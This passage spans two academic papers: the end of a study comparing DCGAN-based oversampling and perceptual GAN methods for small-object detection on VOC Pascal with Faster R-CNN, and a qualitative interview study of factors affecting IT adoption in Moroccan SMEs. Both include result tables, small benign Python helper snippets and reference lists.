The $L_a$ loss encourages the discriminator network to distinguish between the currently generated super-resolved representation of a small object and the original representation of a real large object. In the first phase, the generator is fed with large objects and the real batch is passed forward through the discriminator. Next, the generator is trained with the small object dataset, trying to maximize log(D(G(z))), where G(z) is the fake super-resolved small object image. The generator’s loss, apart from
the adversarial loss, which reflects the probability of the input belonging to a large object, also includes the RPN and ROI losses. The whole network is trained with stochastic gradient descent with momentum 0.9 and learning rate 0.0005. The perceptual GAN training is performed separately for two datasets: the oversampled dataset representing small objects and the original VOC Pascal trainval set for large objects. For the small object dataset, the oversampling strategy with VOC Pascal objects combined with the random class switch was used. First, the evaluation is conducted on the VOC small objects subset. Then an ensemble model is created from the original Faster R-CNN and PCGAN, with a voting mechanism added at the end. This solution makes it possible to detect large objects at a level similar to before and to increase the detection accuracy for small objects.
6 Results
Table 7 shows the mAP scores achieved by the Faster R-CNN model trained with the datasets obtained with the described augmentation strategies and evaluated on the original VOC Pascal dataset.

Table 7. Evaluation of different augmentation strategies, described in Sect. 5. The tests are conducted on the VOC Pascal dataset, split into three size categories (see Sect. 5.1). Mean average precision is given as a percentage, with additional information about the augmented small object train dataset count

Strategy    Small obj count  mAP - small  mAP - medium  mAP - big
Original                861         3.10         12.62      70.38
Strategy 1            3 696         5.79         12.71      66.80
Strategy 2            6 810         5.84         12.95      67.75
Strategy 3            6 810         7.08         14.17      66.73
Strategy 4            6 810         5.47         13.56      67.84
Strategy 5           12 624         7.60         16.28      67.01
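The small-object column of Table 7 can be compared against the original baseline with a few lines of Python. The sketch below only restates the table values and computes the absolute gain (in percentage points) and the relative factor for each strategy; the variable names are illustrative.

```python
# Small-object mAP in percent per training set, copied from Table 7.
small_map = {
    "Original": 3.10,
    "Strategy 1": 5.79,
    "Strategy 2": 5.84,
    "Strategy 3": 7.08,
    "Strategy 4": 5.47,
    "Strategy 5": 7.60,
}

baseline = small_map["Original"]
# Absolute gain over the baseline, in percentage points.
gains = {name: round(value - baseline, 2) for name, value in small_map.items() if name != "Original"}
# Relative improvement factor over the baseline.
ratios = {name: round(value / baseline, 2) for name, value in small_map.items() if name != "Original"}

for name in gains:
    print(f"{name}: +{gains[name]:.2f} points, x{ratios[name]:.2f}")
```

Distinguishing the absolute gain from the relative factor matters here, because a gain of a few percentage points on a 3.10% baseline already corresponds to roughly doubling the score.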
The strategies including random class modification for oversampling with VOC Pascal and generated objects (strategies 3 and 5) outperform the original results by 3.98 and 4.5 percentage points respectively. Generally, increasing the number of samples during training improves the mAP on small objects without any model modification. Even the most naive solution, oversampling the original object without any changes, achieves an almost two times better score. The largest gain is observed for oversampling with DCGAN generated objects. However, the accuracy difference between using VOC Pascal and generated objects is quite low (∼0.6%). In addition, augmenting small objects affects the performance on medium objects. For the first two strategies, mAP remains practically unchanged; for the other cases it achieves a better score than
the original. The best performance is registered for the last oversampling strategy, which combines augmentation with generated objects and the random class switch, with a score of 16.28%. It outperforms the original results and the augmentation with VOC objects by 3.66 and 2.11 percentage points respectively. Summing up, the strategy 5 oversampling method produces the best overall results: firstly, due to the highest number of samples, distributed evenly between categories, and secondly, by enhancing the representation of the objects. In order to demonstrate where the improvement comes from, the Faster R-CNN results per class are presented. Tables 8 and 9 show the results of the oversampling scenarios evaluated on the test VOC Pascal dataset, split by categories. Overall, the presented augmentation strategies bring improvement to most of the analyzed categories for which oversampling was performed. This applies to the following classes: airplane, bird, boat, bus, car, cow, horse, motorcycle, person, potted plant, sheep and tv monitor. As explained in Sect. 4, some categories are not subject to the augmentation procedure due to the very low number of original train and test samples (sofa, dog, table and cat). For the remaining classes (bike, bottle, chair), despite boosting the trainval set representation, no detection improvement is observed. The reason might be the quality and the features of the train and test subsets for those categories, where the majority of small objects are classified as difficult. This outcome is also confirmed by the chair class, where applying representative DCGAN generated objects once again does not influence the achieved mAP score, as all 58 test objects are difficult ones. Additionally, it is worth mentioning that context plays a significant role for the airplane category: the best results are obtained for the second strategy, with no class change. Another interesting observation is that bird and cow are the categories that benefit most from DCGAN generated objects.
The mAP score for bird is 5.34%, which is 4.45 and 1.6 percentage points better than the original and the best VOC oversampling strategy, respectively. The cow category has an at least two times better mAP score with DCGAN based oversampling. On the other hand, the airplane is the only category for which the generated objects used in strategy 5 do not improve the detection accuracy.

Table 8. VOC Pascal categories mAP scores (airplane, bike, bird, boat, bottle, bus, car, chair, cow) for trainval and test set with the division for small, medium, big categories. Mean average precision is given as percentage value

Type        Airplane  Bike  Bird  Boat  Bottle   Bus   Car  Chair    Cow
Original        6.09  0.00  0.89  1.19    0.00  0.00  2.19   0.00   3.16
Strategy 1      7.04  0.00  0.69  1.09    0.00  0.00  4.31   0.00  10.98
Strategy 2     18.70  0.00  2.04  0.00    0.00  0.83  4.26   0.00   4.16
Strategy 3     10.72  0.00  3.74  0.85    0.00  2.38  4.38   0.00   7.08
Strategy 4      2.42  0.00  5.34  1.47    0.00  0.00  4.39   0.00  22.52
Strategy 5      5.37  0.00  1.66  1.36    0.00  0.00  3.99   0.00  41.52
Table 9. VOC Pascal categories mAP scores (horse, motorbike, person, potted plant, sheep and tv monitor) for trainval and test set with the division for small, medium, big categories. Mean average precision is given as percentage value

Type        Horse  Moto  Person  Plant  Sheep     Tv
Original     2.63  0.00    0.92   0.44  20.07   6.20
Strategy 1   2.56  3.57    1.24   3.93  29.09  16.34
Strategy 2   3.03  4.00    1.28   5.17  25.29  13.07
Strategy 3   7.14  5.00    1.43   4.75  34.16  17.47
Strategy 4   1.96  2.17    1.32   2.31  27.39   5.23
Strategy 5   3.03  5.55    1.17   1.03  25.66  16.43
Table 10 provides a summary of the PCGAN training results on augmented VOC Pascal. For this process, the dataset from the third oversampling strategy is used as the small object image dataset, instead of the original VOC Pascal, in order to obtain a similar number of small and big objects, as required for the training phase. Overall, PCGAN increased the mAP for small objects in the nine presented classes. It is apparent that the solution performs much better than simple augmentation strategies. The largest gain in the mAP score is observed for the motorcycle class: from the original 0%, through 5% (oversampling), up to 50% (perceptual GAN). Another significant improvement is seen for the bird category, with a score of 11.62%, which is 2.3 and 13.1 times better than the oversampling and original results. For the aeroplane, boat, bus, cow, sheep and tv monitor categories, the mAP is around 1.5 times better than the oversampling score. Worth mentioning is the cow class, for which Faster R-CNN achieved over 65% accuracy. The following observations may be made at this point. Firstly, the Perceptual GAN can be successfully extended from its initial application to a natural scene image dataset. Secondly, a dedicated solution such as PCGAN, despite its heavier training procedure (generator and discriminator), achieves significantly better detection accuracy for small objects than augmentation methods. The described solution may be efficiently employed in parallel with the original Faster R-CNN to form an ensemble model. The second possibility is to use the conditional generator as described in Sect. 5.2. In both solutions, the original mAP score for big objects is preserved, and the small object mAP is significantly improved. The score for medium objects is at the same level as, or slightly better than, in the original model. After applying these approaches, the mAP for the whole dataset improves by up to 0.3 percentage points (from 69.98% up to ∼70.3%). The small increase is explained by the small percentage of small and medium objects in the test dataset (Tables 1 and 2).
Table 10. Evaluation of PCGAN training described in Sect. 5.2. The results are presented in comparison with original FasterRCNN and oversampling strategy that received best score for given category. All three tests are conducted on small object VOC Pascal test group. Mean average precision is given as percentage value

Strategy           Aeroplane   Bird  Boat   Bus    Cow  Horse  Moto  Sheep     Tv
Original                6.09   0.89  1.20  0.00   3.16   2.63  0.00  20.07   6.20
Best oversampling      18.70   5.34  1.47  2.38  41.52   7.14  5.55  34.16  17.47
PCGAN                  28.97  11.62  2.49  3.45  65.19   9.09  50.0  44.58  27.27
For all simulations presented in the paper, the width-to-height ratios of the generated Faster R-CNN anchors are 0.5, 1 and 2. The anchor scales (areas of anchors) are defined as 8, 16 and 32, with a feature stride of 16. The learning rate is 0.01.
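To make the anchor configuration concrete, the sketch below enumerates the nine anchor shapes implied by three scales and three aspect ratios. It assumes the convention used in common Faster R-CNN implementations, where the base anchor side equals the feature stride multiplied by the scale and the ratio is interpreted as height divided by width with the area kept constant; both the convention and the function name are assumptions, since the text does not spell them out.

```python
import math


def anchor_sizes(stride=16, scales=(8, 16, 32), ratios=(0.5, 1.0, 2.0)):
    """Return (width, height) in pixels for every scale/ratio pair.

    Assumed convention: side = stride * scale for ratio 1, ratio = height / width,
    and the anchor area is preserved across ratios.
    """
    anchors = []
    for scale in scales:
        side = stride * scale  # side of the square anchor at ratio 1
        for ratio in ratios:
            width = side / math.sqrt(ratio)
            height = side * math.sqrt(ratio)
            anchors.append((width, height))
    return anchors


anchors = anchor_sizes()
for width, height in anchors:
    print(f"{width:7.1f} x {height:7.1f}")
```

Under this reading the square anchors measure 128, 256 and 512 pixels per side, and each is accompanied by one wide and one tall variant of the same area.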
7 Conclusions and Future Work
The work presents a comparison of a few strategies for improving small object detection. The presented results show that the solution with the GAN architecture outperforms other well-known augmentation approaches. The perceptual GAN is significantly better than oversampling strategies based on DCGAN image generation. It achieves better results with a similar amount of training data. It is worth noting that all presented approaches required a 10–20 fold increase in the number of small objects. Future work will concentrate on further improvements using the perceptual GAN. The experiments will focus on exploring the perceptual GAN architecture. Next, the solution will be tested on other object detection datasets.
References
1. Ren, S., Ross, K.H., Sun, G.J.: Faster R-CNN: towards real-time object detection with region proposal networks. https://papers.nips.cc/paper/5638-faster-rcnn-towards-real-time-object-detection-with-region-proposal-networks.pdf
2. Goodfellow, I., et al.: Generative adversarial nets. In: Advances in Neural Information Processing Systems, pp. 2672–2680 (2014). http://papers.nips.cc/paper/5423-generative-adversarial-nets.pdf
3. Li, J., Liang, X., Wei, Y., Xu, T., Feng, J., Yan, S.: Perceptual generative adversarial networks for small object detection (2017). https://arxiv.org/pdf/1706.05274.pdf
4. Everingham, M., van Gool, L., Williams, C., Winn, J., Zisserman, A.: The PASCAL visual object classes homepage (2014). http://host.robots.ox.ac.uk/pascal/VOC/
5. Girshick, R., Donahue, J., Darrell, T., Malik, J.: Rich feature hierarchies for accurate object detection and semantic segmentation (2014). https://arxiv.org/pdf/1311.2524.pdf
6. Redmon, J., Divvala, S., Girshick, R., Farhadi, A.: You only look once: unified, real-time object detection (2016). https://arxiv.org/pdf/1506.02640.pdf
7. Liu, W., et al.: SSD: single shot multibox detector (2016). https://arxiv.org/pdf/1512.02325.pdf
8. Ledig, C., et al.: Photo-realistic single image super-resolution using a generative adversarial network (2017). https://arxiv.org/pdf/1609.04802.pdf
9. Radford, A., Metz, L., Chintala, S.: Unsupervised representation learning with deep convolutional generative adversarial networks (2016). https://arxiv.org/pdf/1511.06434.pdf
10. Krizhevsky, A., Nair, V., Hinton, G.: Cifar-10, Cifar-100 dataset (2009). https://www.cs.toronto.edu/kriz/cifar.html
11. Simonyan, K., Zisserman, A.: Very deep convolutional networks for large-scale image recognition (2015). https://arxiv.org/pdf/1409.1556.pdf
12. He, K., Zhang, X., Ren, S., Sun, J.: Deep residual learning for image recognition (2015). https://arxiv.org/pdf/1512.03385.pdf
13. Frid-Adar, M., Diamant, I., Klang, E., Amitai, M., Goldberger, J., Greenspan, H.: GAN-based synthetic medical image augmentation for increased CNN performance in liver lesion classification (2018). https://arxiv.org/pdf/1803.01229.pdf
14. Xiao, C., Li, B., Zhu, J.-Y., He, W., Liu, M., Song, D.: Generating adversarial examples with adversarial networks (2019). https://arxiv.org/pdf/1801.02610.pdf
15. Lin, T.-Y., et al.: Microsoft COCO: common objects in context (2015). https://arxiv.org/pdf/1405.0312.pdf
16. Lin, T.-Y., Goyal, P., Girshick, R., He, K., Dollar, P.: Focal loss for dense object detection (2018). https://arxiv.org/pdf/1708.02002.pdf
17. Lin, T.-Y., Dollar, P., Girshick, R., He, K., Hariharan, B., Belongie, S.: Feature pyramid networks for object detection (2017). https://arxiv.org/pdf/1612.03144.pdf
18. Hu, P., Ramanan, D.: Finding tiny faces (2017). https://arxiv.org/pdf/1612.04402.pdf
19. Lim, J.-S., Astrid, M., Yoon, H.-J., Lee, S.-I.: Small object detection using context and attention (2019). https://arxiv.org/pdf/1912.06319.pdf
20. Hu, G., Yang, Z., Hu, L., Huang, L., Han, J.: Small object detection with multiscale features. Int. J. Digit. Multimedia Broadcast. 1–10 (2018)
21. Kisantal, M., Wojna, Z., Murawski, J., Naruniec, J., Cho, K.: Augmentation for small object detection (2019). https://arxiv.org/pdf/1902.07296.pdf
22. Chen, Y., Li, J., Niu, Y., He, J.: Small object detection networks based on classification-oriented super-resolution GAN for UAV aerial imagery. In: Chinese Control And Decision Conference (CCDC), pp. 4610–4615 (2019)
23. Jiang, W., Ying, N.: Improve object detection by data enhancement based on generative adversarial nets. https://arxiv.org/pdf/1903.01716.pdf
24. Bai, Y., Zhang, Y., Ding, M., Ghanem, B.: SOD-MTGAN: small object detection via multi-task generative adversarial network (2018)
25. Krause, J., Stark, M., Deng, J., Fei-Fei, L.: 3D object representations for fine-grained categorization. In: 4th International IEEE Workshop on 3D Representation and Recognition (3dRR-13), Sydney, Australia (2013)
26. Goodfellow, I.J., Shlens, J., Szegedy, C.: Explaining and harnessing adversarial examples, arXiv preprint arXiv:1412.6572 (2014)
27. Goodfellow, I., et al.: Generative adversarial nets. In: NIPS, pp. 2672–2680 (2014)
28. Radford, A., Metz, L., Chintala, S.: Unsupervised representation learning with deep convolutional generative adversarial networks (2016)
Factors Affecting the Adoption of Information Technology in the Context of Moroccan SMEs
Yassine Zouhair, Mustapha Belaissaoui, and Younous El Mrini
SIAD Laboratory, Hassan First University of Settat, Settat, Morocco
{y.zouhair,mustapha.belaissaoui,younous.elmrini}@uhp.ac.ma
Abstract. Today, information technology (IT) has become the foundation for streamlining processes, optimizing costs and organizing information, transforming traditional business models into dynamic enterprises that make their operations profitable through technology. The accelerated adoption of IT-as-a-service solutions is one of the fastest growing trends among businesses of all sizes. Despite the great benefits they are expected to bring to businesses, the level of IT usage in Moroccan small and medium-sized enterprises (SMEs) remains very low. This article attempts to identify the factors that influence the adoption of IT in the context of Moroccan SMEs. We applied a qualitative research approach using the interview technique. The population of this study includes team leaders, users, internal IT managers, external consultants and individuals who are familiar with the Moroccan SME sector, with different levels of education and experience. The research results indicate that several determinants affect the willingness of SMEs to adopt IT. These determinants are of two types: internal determinants, which refer to organizational and individual factors, also referred to as factors specific to the organization; and external determinants, which include factors specific to the technology and factors related to the environment in which the organization operates.
Keywords: IT · Adoption · Challenges · Integrated IS · Moroccan SMEs
1 Introduction
Today’s company is faced with a constantly changing economic context, strong economic pressures and strategic decisions critical to its survival:
• Increasingly fierce competition.
• Rapid commercial reactivity.
• Need to innovate.
• Increasing overhead costs.
• Cost reduction requirements to remain competitive.
• Obligation to follow new technologies.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 286–296, 2023. https://doi.org/10.1007/978-3-031-28073-3_20
Today, IT has become essential to the activity of a company, in an economic context that is constantly changing [1]. The application of IT can be considered as the use of an information system (IS) to control information at all levels of the company [1]. The IS is closely linked to all functions and facets of the company and is becoming essential. Without it, it becomes difficult for a company to compete, to manage administrative constraints and to stay informed of what is happening in the economic markets [1]. The IS plays an essential role in supporting organizational processes and is considered a “nervous system” [2, 3]. The IS comprises the infrastructure of IT, data, applications and personnel, and links these elements to provide a complete solution [4]. As such, it includes a large number of functions, such as data collection and transmission. Nowadays, Moroccan companies, including SMEs, are faced with ever-changing market requirements. In order to best serve the organization, it is important to achieve a coherent and agile IS that can integrate the new needs of the company. However, while the IS plays a central role in the activity and life of the company and can contribute to rationalization and growth, it can also be the cause of chaotic operation. Guariglia et al. explain that SMEs reduce their level of investment in technology development because of limited financial resources and the difficulty of obtaining external funding [5]. Parasuraman measures readiness to use technology with the Technology Readiness Index (TRI), which has four dimensions: optimism, innovation, unease, and insecurity [6]. Many studies have examined the readiness to use information technology, but none have focused on the factors that influence the readiness of SMEs to adopt technology. This paper attempts to identify the factors that influence the adoption of IT in the context of Moroccan SMEs.
2 Research Question
The diffusion of IT within developing countries can be an effective lever for economic and social development. IT is both a good and a service that allows a wide diffusion of knowledge and know-how, and an investment good that increases the microeconomic performance of companies by raising productivity; it also constitutes an industry that can contribute significantly to the macroeconomic performance of nations. Today, IT plays a predominant role in the development of Moroccan SMEs by supporting one or several functions within the organization. The purpose of this research is to identify the factors that influence the adoption of IT in the context of Moroccan SMEs. The research addresses the following question: What are the factors that influence the adoption of IT in the context of Moroccan SMEs?
Y. Zouhair et al.
3 Literature Review
3.1 Definition of SME
Size is the criterion most often considered when defining an SME, notwithstanding the diversity of approaches that have attempted a definition. Each country defines the SME in its own way, usually on the basis of the number of employees. According to the “White Paper on SMEs”, produced by the Ministry of the Prime Minister in charge of General Government Affairs (1999), it is not easy to define the term SME. In Morocco, there are several definitions, depending on the elements taken into consideration. To qualify as an SME, existing companies must have a workforce under 200 permanent employees, have an annual turnover excluding tax under 75 million Moroccan Dirham (MAD), and/or a balance sheet total under MAD 50 million. However, the definition of the SME elaborated by the ANPME takes into account only the turnover criterion and disregards the number of workers in the company. According to this last definition, three types of companies are distinguished:
• The very small company: less than 3 million MAD
• The small company: between 3 and 10 million MAD
• The medium enterprise: between 10 and 175 million MAD
3.2 Adoption of Information Technology
Parasuraman [6] defines technological readiness as “the propensity of people to adopt and use new technologies to achieve goals in private life and in the workplace”. The TRI is an index developed by Parasuraman [6] to measure a person’s ideas and beliefs about the application of technology. A person’s thinking about the application of technology can be positive, i.e. being optimistic about the application of technology and willing to use new technologies, or negative, i.e. feeling uncomfortable with technology.
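The ANPME turnover bands listed in Sect. 3.1 can be written as a small lookup. The following is only a minimal sketch: the function name is hypothetical, and because the text does not say which band the shared bounds (3, 10 and 175 million MAD) belong to, the assignment chosen here is an assumption.

```python
def classify_by_turnover(turnover_million_mad: float) -> str:
    """Return the ANPME size band for an annual turnover given in million MAD."""
    if turnover_million_mad < 0:
        raise ValueError("turnover must be non-negative")
    if turnover_million_mad < 3:
        return "very small company"
    # Assumption: the shared bounds 10 and 175 are assigned to the lower band;
    # the source only says "between 3 and 10" and "between 10 and 175".
    if turnover_million_mad <= 10:
        return "small company"
    if turnover_million_mad <= 175:
        return "medium enterprise"
    return "outside the SME bands"


if __name__ == "__main__":
    for turnover in (2.5, 8.0, 60.0, 200.0):
        print(turnover, "->", classify_by_turnover(turnover))
```

Note that this band structure uses turnover only; the workforce and balance-sheet criteria of the first definition are deliberately left out.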
There are four dimensions to technology readiness:
Optimism: refers to a positive view of technology as well as the perceived benefits of using technology.
Innovation: refers to the degree to which the person enjoys experimenting with the use of technology and being among the first to try the latest technology services or products.
Discomfort: refers to the lack of mastery of technology as well as a lack of confidence in the use of technology.
Insecurity: refers to the distrust of technology-based transactions.
Optimism and innovation are “contributors” that can increase technology readiness, while discomfort and insecurity are “inhibitors” that can suppress it [7]. According to Parasuraman et al. [7], technology readiness is a tool for measuring thoughts or perceptions about technology use, not a measure of a person’s ability to use technology. Depending on the level of technology readiness, users are classified into five segments: Explorers have the highest score in the ‘contributor’ dimension (optimism and innovation) and a low score in the ‘inhibitor’ dimension (discomfort and insecurity); they are easily attracted to new technologies and generally become the first group to try them [8]. The laggards have the lowest score in the ‘contributor’ dimension and the highest score in the ‘inhibitor’ dimension; they are the last group to adopt a new technology [8]. The others (the pioneers, the skeptics and the paranoids) have a very complex perception of technology [8]. Pioneers have a high level of optimism and innovation, like explorers, but they can easily stop using a technology if they experience discomfort and insecurity [8]. Skeptics are not very motivated by the use of technology, but they have a low level of the ‘inhibitor’ dimension; they need to be informed about and convinced of the benefits of the technology [8]. Paranoids find technology quite interesting, but they always take the risk factor into account, which gives them a high level of the ‘inhibitor’ dimension (discomfort and insecurity) [8].
Lucchetti et al. [9] studied several cases of Italian SMEs and noted that the adoption and use of information and communication technologies (ICT) differed depending on the nature and internal funds of the company, on the one hand, and on the technological skills used in the company, on the other. According to Harindranath et al. [10], the fear of limited use of technology and the need to update technology frequently are among the concerns of UK SMEs. According to Nugroho et al. [11], customer pressure, need, capital, urgency, and ease of use are the factors that influence SMEs in Yogyakarta to adopt IT. Research has shown that the relative advantage of these technologies, competitive pressure, and management support are significant predictors of IT adoption [12]. According to Beatty et al. [13] and Dong [14], leaders and their commitment play a crucial role in the IT adoption decision. Thong et al. [15] state that the CEO’s innovativeness, IT knowledge and attitude towards adopting IT, together with company size, information intensity and the competitive environment, are the factors that influence SMEs to adopt IT. According to Khalil [16], organizational structure, technology strategy, human organization and external environment affect the intention to adopt IT. Grandon et al. [17] and Tung et al. [18] found that social influence and external pressure are significantly related to IT adoption.
The results of Naushad et al. [19] indicate that SMEs adopt IT to gain an advantage over their competitors. Value creation, productivity, ease of use and affordability are the top reasons. Top management support and cost-effectiveness are other essential factors that influence IT adoption. Other pertinent factors include personal characteristics and technology self-efficacy. Shaikh et al. [20] affirm that high infrastructure costs, data security, cost of training, lower efficiency and technical skills, lower government support and lack of support from the organization are factors that influence the adoption of IT. Kossaï et al. [21] show that firm size, export and import intensity, and business human capital are the most significant factors in the adoption of IT. In our study, technological readiness can be defined as the preparation to improve the quality of the currently used technology, in other words to update the level of the technology.
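To make the contributor/inhibitor reading of the TRI dimensions in Sect. 3.2 more concrete, the following is a minimal sketch and not Parasuraman’s published scoring procedure. It assumes that each dimension has already been reduced to a single score on a 1 to 5 scale; the function name and the `net` summary (contributor mean minus inhibitor mean) are hypothetical choices made only for illustration.

```python
from statistics import mean

# Dimension names as used in this paper (Sect. 3.2).
CONTRIBUTORS = ("optimism", "innovation")
INHIBITORS = ("discomfort", "insecurity")


def readiness_profile(scores: dict) -> dict:
    """Summarize four dimension scores (assumed 1-5 scale) into sub-scores."""
    missing = [d for d in CONTRIBUTORS + INHIBITORS if d not in scores]
    if missing:
        raise KeyError(f"missing dimensions: {missing}")
    contributor = mean(scores[d] for d in CONTRIBUTORS)
    inhibitor = mean(scores[d] for d in INHIBITORS)
    # Hypothetical summary: a higher value means contributors outweigh inhibitors.
    return {
        "contributor": contributor,
        "inhibitor": inhibitor,
        "net": contributor - inhibitor,
    }


if __name__ == "__main__":
    # An explorer-like respondent: high contributors, low inhibitors.
    explorer_like = {"optimism": 4.5, "innovation": 4.0,
                     "discomfort": 1.5, "insecurity": 2.0}
    print(readiness_profile(explorer_like))
```

Assigning respondents to the five segments would need cut-off values that the text does not give, so the sketch stops at the two sub-scores.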
4 Research Methodology
This paper attempts to identify the factors that influence the adoption of IT in the context of Moroccan SMEs. We applied a qualitative research approach using the interview technique. This research used a multiple-case study design to describe the phenomenon [22]. According to Yin [22, 23], the case study method can be used to explain, identify, or study events or phenomena in their real-life context. In addition, “case studies are particularly recommended when dealing with new and complex areas, where theoretical developments are weak and the recovery of the context is crucial for the development of the understanding process” [22, 23]. The case study method is relevant when the study has to answer research questions such as “what”, “how” and “why” [22, 23], which fits our problem exactly. In this research, we used the snowball sampling technique, and the results of the interviews were analyzed using a descriptive statistical approach. Prior to the interview session, informants were given sample questions to discuss during the interview sessions.
Participants
The population of this study includes team leaders, users, internal IT managers, external consultants, and people with knowledge of the Moroccan SME sector, with different levels of education and experience. The idea is to collect data from organizations operating in the SME sector in order to identify factors that influence the adoption of IT in the Moroccan SME context. All case organizations operate in the private sector in Morocco. The organizations are labeled Company A, Company B, Company C and Company D. Table 1 provides an overview of the cases studied.
Table 1. Description of the case studies
Characteristic | Company A | Company B | Company C | Company D
Nature and industry | Consulting | Transport & Logistics | Audit | Service
Number of employees | 20 | 90 | 24 | 41
Number of interviews | 6 | 9 | 5 | 7
Interview participants | Managers, team leaders, users and internal IT managers | Managers, team leaders, users, external consultants and internal IT managers | Managers, team leaders, users and internal IT managers | Managers, team leaders, users and internal IT managers
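As a quick consistency check, the figures in Table 1 can be tallied in a few lines. The dictionary layout below is merely one convenient, hypothetical way to hold the table; the numbers are those reported for the four cases.

```python
# Case data transcribed from Table 1.
cases = {
    "Company A": {"industry": "Consulting", "employees": 20, "interviews": 6},
    "Company B": {"industry": "Transport & Logistics", "employees": 90, "interviews": 9},
    "Company C": {"industry": "Audit", "employees": 24, "interviews": 5},
    "Company D": {"industry": "Service", "employees": 41, "interviews": 7},
}

# Total number of interviews across the four organizations.
total_interviews = sum(case["interviews"] for case in cases.values())

# Every case stays under the 200-employee workforce threshold from Sect. 3.1.
all_under_threshold = all(case["employees"] < 200 for case in cases.values())

print(total_interviews)      # 27
print(all_under_threshold)   # True
```

The total agrees with the 27 interviews reported for the study.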
Procedure
We applied a qualitative research approach using the interview technique. The data were collected through personal interviews; a total of 27 interviews were conducted in the four organizations. Interviews were conducted with managers, team leaders, users, external consultants and internal IT managers in order to collect the different perspectives on what influences the adoption of IT in the context of Moroccan SMEs. The interviews lasted between 30 and 60 min. E-mails and telephone calls were used to clarify some questions. In the first phase of the interview, informants were asked to provide demographic and company information. In the second phase, we asked questions based on Parasuraman’s instruments [6], for example:
• How does the IS contribute to the company’s sustainability?
• Do you have unpleasant experiences in using the IS?
• How does the IS affect your work?
• Why do you want to apply IS in your company?
• Why don’t you want to apply IS in your company?
• Describe your reasons to use or not use IS in your company.
• Tell me about your experience interacting with IS.
• When choosing an IS, how will you select the system that you believe is best for your company?
• How does the environment affect your decision to use IS?
• The company is still supporting the advancement of the use of technology. Has the progress of the system already brought benefits to your company?
• For what kind of condition and purpose is it intended?
5 Findings and Results
The frequency of technology adoption varies from organization to organization. This is the result of a range of organizational, individual, technological, and environmental factors, which are directly or indirectly correlated with the decision to adopt or not adopt. The determinants discussed in this research are the results of the informant interviews.
5.1 Organizational Factors
Organizational factors are primarily related to the structure and strategy of the organization. The first factor is organizational strategy. Informants state that the level of communication between departments within an organization is positively correlated with the commitment of departments to the process of adopting innovations, and that establishing a project management team responsible for the implementation and integration of these technologies significantly increases the probability of successful adoption. The second factor is the size of the company, which is presented as a good predictor of technology adoption: informants say that as the size of the company increases, IT becomes necessary. The informants also pointed out the importance of tangible resources of a human and material nature, as well as intangible resources, notably the stock of knowledge at the enterprise level, in the decision-making process for the adoption of new technologies. Material resources are critical for innovation, development and new technology acquisition projects. For their part, human resources and intangible resources, especially the stock of knowledge available to firms, affect their propensity to adopt new technologies through their impact on the capacity to absorb the knowledge incorporated into these new technologies. Employee competence is among the factors for IT adoption mentioned by informants: the more qualified the staff, the more likely they are to seek out new technologies. Staff skills refer to the competence of employees, their level of experience, and their versatility.
According to the informants, technological compatibility positively influences the adoption decision. This technological compatibility has two dimensions: a high degree of confidence that the new technology is compatible with the company’s current operations and practices, and the company’s belief that the necessary resources for implementing and integrating the technology are available, above all its conviction that it has the competent human resources to succeed in adopting and integrating the new technology. Informants mentioned that the vision of the organization’s senior management and their knowledge of the innovation or technology to be adopted would also be significant determinants of whether or not to adopt that innovation or technology. Finally, some informants identified the timing of a technology’s adoption as a determinant of whether or not it is adopted.
5.2 Individual Factors
The second category of factors is individual factors. Informants mentioned that the perceived usefulness of a technology significantly and positively influences the decision to adopt it: when the potential user of the technology perceives that its use will increase production while maintaining quality, decrease the unit production cost, and make the company more competitive, the likelihood of its adoption increases. Some informants argued that individuals in an organization, regardless of its size, are decisive in the decision to adopt a new technology, as adoption depends directly on their skills, knowledge, and ability to foster successful implementation of the technology. On the other hand, other informants identified user resistance to technology as a barrier to adoption.
5.3 Technological Factors
This category of factors refers to factors external to the company. These are essentially non-controllable factors directly related to the technology to be adopted, such as its attributes, its maturity and its characteristics. These characteristics include the perceived compatibility of the technology to be adopted with existing technologies, its complexity, and the perceived net benefit of its adoption. Informants identified the acquisition and integration costs of a new technology as important and often decisive barriers to adoption by the company. The complexity of the technology to be adopted could also be a barrier to adoption. Since the potential users of this technology will be the employees, we capture this complexity by the intensity of the barriers experienced by the informants. A final factor in this category is the uncertainty related to the evolution of the technology within the company.
5.4 Environmental Factors
Informants mentioned that the extent of the SME’s social network, including suppliers, customers, and research institutions, can influence its decision whether to adopt a new technology. These networks help build trust and social capital between the firm and its key partners. The firm can thus reduce transaction costs and establish reliable and efficient communication with the members of its network. This creates a climate that is conducive to innovation and the successful integration of new technologies. All informants expressed the idea that the use of IT can help in the marketing of products. Beyond its role as an aid to marketing, some informants believe that customer satisfaction can be obtained through the adoption of IT because it allows for interaction between the potential buyer and the products. Table 2 summarizes the various factors that influence the adoption of IT in the context of Moroccan SMEs.
Table 2. IT adoption factors
Category | Factors
Organizational | Organizational strategy; The size of the company; Human and material resources; The stock of knowledge at the company level; The competence of the employees; Technological compatibility; The vision of the organization’s senior management; The timing of adoption
Individual | Perceived usefulness of the technology; Individual skills, knowledge, and abilities; Resistance to change
Technological | Technology characteristics: relative advantage, perceived compatibility and complexity; Acquisition costs and integration costs; Technology maturity; Perceived net benefit of the technology; The level of uncertainty associated with the technology
Environmental | The company’s social network and its role as a source of information (customers, competitors, suppliers, research institutions, etc.); Knowledge sharing with suppliers and customers; Reliable and effective communication with members of its network
6 Conclusion and Future Work
The purpose of this study was to identify the factors that influence the adoption of IT in the context of Moroccan SMEs. We applied a qualitative research approach using the interview technique, with a multiple-case study design to describe the phenomenon. The frequency of technology adoption varies from one organization to another and is the result of a range of organizational, individual, technological, and environmental factors that are directly or indirectly correlated with the decision to adopt or not to adopt. The determinants discussed in this research are the results of the interviews conducted with the informants. These determinants are of two types: internal determinants, which refer to organizational and individual factors, also referred to as organization-specific (controllable) factors; and external determinants, which include technology-specific factors (technological factors) and factors related to the environment in which the organization operates (environmental factors). This study has several limitations, namely:
• The difficulty of extending the scope to other Moroccan SMEs
• The confidentiality of the companies
The study provides several future research themes: critical success factors for IT implementation projects in the context of Moroccan SMEs, extending this study to other Moroccan SMEs, and confirming the results of this qualitative research with quantitative research.
References
1. Carpentier, J.-F.: La gouvernance du Système d’Information dans les PME Pratiques et évolutions. Editions ENI (2017)
2. St-Hilaire, F.: Les problèmes de communication en entreprise: information ou relation? Diss. Université Laval (2005)
3. Millet, P.-A.: Une étude de l’intégration organisationnelle et informationnelle. Application aux systèmes d’informations de type ERP. Diss. INSA de Lyon (2008)
